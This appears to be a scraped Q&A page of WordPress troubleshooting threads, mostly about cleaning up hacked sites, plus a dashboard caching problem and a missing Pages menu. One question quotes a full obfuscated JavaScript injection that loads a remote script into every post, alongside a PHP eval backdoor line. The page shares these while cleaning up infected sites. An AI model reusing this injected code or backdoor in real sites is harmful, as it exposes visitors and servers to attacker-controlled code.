Develop Reference

My wordpress website being hacked with code eval($_SERVER['HTTP_81DB2B3']

I have a problem with my website, I get information from wordfence about my WordPress website getting hacked
enter image description here add found a code eval($_SERVER['HTTP_81DB2B3'] so i removed it but in a few second the code going back. someone, please help me

I had something very similar to this. Go to your cPanel and search for "Cron Jobs" and scroll down to see if there's any malicious cronjobs setup. You might have some that look like eval(gzinflate(base64_decode(.... that are essentially causing this to reoccur. Not a complete fix to this issue, but you'll have to delete those cronjobs to ensure that that line of code doesn't keep reappearing. In addition to that, you'll also need to make sure those cronjobs don't show up again. Use a plugin like Wordfence (suggested above as well) to look for malicious files and if it helps replace your home directory (except for wp-content and wp-config) with fresh files.

If your website got hacked then I guess more than 1 file was affected by it,
case-1: If you are able to access the Wordpress Backend In this case, if you are able to access the Wordpress backend then I suggest you
Step-1: Add one plugin called (Wordfence Security – Firewall & Malware Scan
) and scan your website with it.
Step-2: After scanning the site remove all suspicious code from the site.
Case 2: If you are not able to access the Wordpress backend then you have to update your Wordpress manually with the hosting file manager or FTP.
Please Note: Please take a backup of your website before do any changes.

Wordpress doesn't display PAGES link on Dashboard

I have had this site since 2014 and have been updating regularly. All of a sudden, there is no link on the dashboard to access existing pages. They are there (viewable), but there appears to be no way to edit existing pages or to add new pages. Where did the expected link go, and how do I get it back?

I would suggest re-uploading all the Wordpress core files. I suspect some file is missing or corrupt.
Make sure that all of your file permissions are correct (FTP/SSH).
It is a good idea to disable plugins one by one and switch to a default theme as well and see if the Pages menu item appears in your Wordpress administration. You can find the culprit this way.
PS. Backup the site prior to re-uploading the files.

How does a virus infect my WordPress site?

For the second time, I’m removing the Malware injection from posts on my WordPress site:
<script type=text/javascript>eval(String.fromCharCode(118,97,114,32,117,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,57,44,49,49,53,44,52,54,44,49,49,53,44,49,49,54,44,49,48,53,44,49,49,56,44,49,48,49,44,49,49,48,44,49,48,50,44,49,48,49,44,49,49,52,44,49,49,48,44,57,55,44,49,49,48,44,49,48,48,44,49,49,49,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,53,44,49,49,54,44,49,48,57,44,54,51,44,49,49,56,44,54,49,44,49,49,53,44,49,48,56,44,49,48,56,44,49,48,56,44,52,57,44,52,54,44,53,51,44,52,54,44,53,54,41,59,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,32,115,46,116,121,112,101,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,54,44,49,48,49,44,49,50,48,44,49,49,54,44,52,55,44,49,48,54,44,57,55,44,49,49,56,44,57,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,59,32,118,97,114,32,112,108,32,61,32,117,59,32,115,46,115,114,99,61,112,108,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,118,97,114,32,108,105,115,116,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125));</script>
This code was inside every post.
Using the plugin Better Search Replace, I deleted all found inserts from all posts. No inserts were found in other database tables.
I checked the site for viruses using various plugins - such as Wordfence, etc. No infection results.
Only I work with sites. My computer is well protected. Checked with different anti-virus scanners - everything is clean!
I tried to find modified WordPress files as well as plugins. Purely! No suspicious files found!
How to find the cause of infection?

There are 2 reasons why you are not able to remove jar.trafficbetter.biz malware from your WordPress site.
you are using old, outdated nulled theme/child theme on your Wordpress site.
the code was SQL injected to your database, and code is being populated on you site again and again.
these are a clever piece of code and cannot be detected by any antivirus,
if you want to know what the code is doing use the following link.
https://blog.sucuri.net/2017/04/wordpress-security-unwanted-redirects-via-infected-javascript-files.html
So to solve the problem, change or update your theme to the latest version.
backup your database, and then search for the script in the database and remove the entry.

Wordpress Dashboard broken, displays “flashbacks” of comments/plugins/updates

I’m using the latest version of Wordpress (4.7.4).
I have something very weird going on in my Dashboard. Not sure when this started.
Can’t say for sure it started with the latest version of Wordpress or not.
My Dashboard became completely useless.
It’s like it’s showing me a flashback of a Dashboard from a few days or hours ago:
Comments I’ve deleted in the Dashboard (hitting “trash”) are suddenly back there, awaiting my moderation.
Plugins I’ve deactivated or even deleted are all back there and according to Dashboard still running (while in my FTP folder they’re certainly gone).
The plugin page cannot be trusted anymore as it shows some plugins are activated that aren’t and vice versa. I have to check on my actual website to confirm which ones are running.
Updates aren’t shown correctly. Once I’ve updated a plugin, a few minutes later it shows me again that there’s a new update.
As you can tell it’s all pretty much the same phenomenon.
It’s as if I’m seeing an older version of my Dashboard.
Not sure what else is broken.
The only other thing I noticed is that even on my actual blog I still see a comment. Blog post says “1 comment”, but the actual comment doesn’t show up.
At first, this all sounds like a “cache problem”.
But I’ve already turned off all caching:
No caching plugin installed
Turned off server caching via htaccess
Disabled leverage browser caching
Emptied my own browser cache
Other things I tested:
Turn off all plugins.
Switch to the standard Wordpress theme “Twenty Twelve”
I tried WP_DEBUG, but nothing related shows up.
I researched the internet, but nobody has described a similar problem, so I suppose this is not a common Wordpress issue.
The issue remains.
Unfortunately I’m not a developer and don’t know too much about the Wordpress codex etc.
But to me it sounds that the mistake is definitely not in the plugin or theme folder.
The problem is that I’ve reached the point where I really cannot turn off plugins via Dashboard properly anymore. It’s so annyoing!
My questions are:
Is it safe to assume that this is related to the Wordpress core
files?
What files exactly are in “charge of” the Dashboard?
Should I just try to re-download the newest Wordpress version and replace a few files (if so which ones)?
Should I do a clean Wordpress re-install or would that be too drastic?
Any other suggestions?
EDIT:
Additionally I tried now:
I manually downloaded the newest version of Wordpress and did just as
described on the Wordpress.org website. I manually replaced wp-admin,
wp-include folders and all root files. The issue remains...
The way my Dashboard is right now, I really can’t use it.
Please advice!

I contacted my host service again.
They just gave me the same line to insert into my .htaccess file and I told them I already tried it and it didn't work.
I then showed them my .htaccess file and they deleted the whole part that concerned their server caching.
Now server caching is completely off and everything works again.
Still not sure why this previously never caused issues.
In the end, it had nothing to do with Wordpress.
I hope this answer will help people who run into similar problems.

Meta Description Shows Spam

I have website (thebyandby.com) that got hacked several weeks ago. The problem is, the description on Google is showing a spam description for viagra and one the most popular posts (when linked to from Google) goes to a spam website.
The site is a WordPress website so I reinstalled the theme and made sure everything was updated. There are only two plugins installed, Akismet and Google Analytics. I don't think the plugins could be effected but I am not sure. The problem was still there so I checked when Google last indexed my site and it was after I had reinstalled my theme. I checked for malware from Google Webmaster and it said it didn't find any malware. I ran grep -r "viagra" on my entire web directory and nothing was found. I really don't know what else to do. Could this be a database problem?

Yes, it could well be that you have content in the database which is compromised. After all, that's where all the pages and posts are stored. Does your hosting company provide a tool like phpMyAdmin for browsing and editing the database?
But equally, if you have only reinstalled the theme then there are a lot more core WordPress files that could have been compromised by the hacker. Given that you are having problems, it would be well worth doing a complete reinstall of the WordPress files. Just make sure you keep a copy of your wp-config file, as you will need to copy that back. Also make sure you reinstall the same version of WordPress that you currently have.
But you know what: It may save you time in the long-run to just export all your posts and pages from within WordPress and then wipe the hacked site completely and install the whole thing from scratch. You can open the export file in any decent editor and once you've got your head around the XML structure, you can delete any rubbish that the hacker put there. I guess this option depends on how much content you had already put up on the site and how readily you could reconfigure the new site to match the old one.
Of-course if you have a full files and database backup from before the hacker got there, then you have an easy option that avoids all this grief ;-)